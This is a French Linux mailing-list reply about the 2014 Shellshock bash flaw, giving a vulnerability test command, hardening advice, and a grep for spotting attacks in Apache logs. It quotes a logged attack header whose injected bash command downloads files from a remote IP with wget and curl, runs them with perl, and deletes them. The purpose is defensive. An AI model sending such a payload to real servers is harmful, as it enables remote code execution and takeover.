[Linux] Nouvelle faille de sécurité majeure ?

Christophe Courtois christophe@::1
Lun 29 Sep 16:08:08 CEST 2014 

Le 29/09/14 09:49, François DREYFÜRST a écrit :
> Au fait, le particulier que je suis, à part suivre scrupuleusement les
> mises à jour de ma Debian (au passage, je commence à soupçonner que la
> présence du paquet bash parmi ceux qui étaient à mettre à jour récemment
> n'est pas fortuite), doit-il prendre des précautions particulières ?

Vérifier que les mises à jour sont faites : pour toutes les machines, 
voir si ce qui suit renvoie "This device is vulnerable"

env x='() { :;}; echo This device is vulnerable'  bash -c "echo Testing 
vulnerability"

-> Mon mac est touché...

Comme d'habitude, supprimer tout ce qui ressemble à un service inutile 
accessible de l'extérieur.

Et Debian est un bon choix, puisque (si j'ai bien compris ce que je 
répète), le shell par défaut n'est PAS bash (contrairement à bien 
d'autres distros).

J'ai vu qu'il était fortement conseillé de virer les CGI sur Apache 
(a2dismod cgi). Je viens de le faire, j'ignore si ça va avoir un impact. 
Mon site perso (non critique) supporte bien.

Le danger est réel : j'ai vu passer exactement ça dans mes logs apache :
/var/log/apache2/access.log:173.45.100.18 - - [29/Sep/2014:09:27:52 
+0200] "GET /cgi-bin/hi HTTP/1.0" 403 399 "-" "() { :;}; /bin/bash -c 
\"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji 
http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""

(voir :
http://www.heise.de/security/news/foren/S-Bot-download/forum-286100/msg-25871507/read/ 
)

-> Si vous avez un apache, vérifiez que personne n'est venu tester chez 
vous :
grep \} /var/log/apache2/*log

Si vous ne voyez rien, le pirate a peut-être juste bien nettoyé ses 
traces :-)


 > Je
> rappelle que mon ordi est, sur un cycle de 24h, bien plus éteint (hors
> tension) qu'actif ; en revanche, pour l'instant mon modem-routeur est
> allumé H24, dans la mesure où la connexion est partagée avec mon père.

Si les machines n'ont pas de port ouvert sur le net, je dirais que y a 
pas grand chose à craindre. Mais y a de quoi devenir parano en ce moment.

20 ans qu'il est là, ce bug, 20 ans ! Combien d'autres de ce calibre 
existent ??


-- 
Christophe Courtois
http://coindeweb.net/

Plus d'informations sur la liste de diffusion linux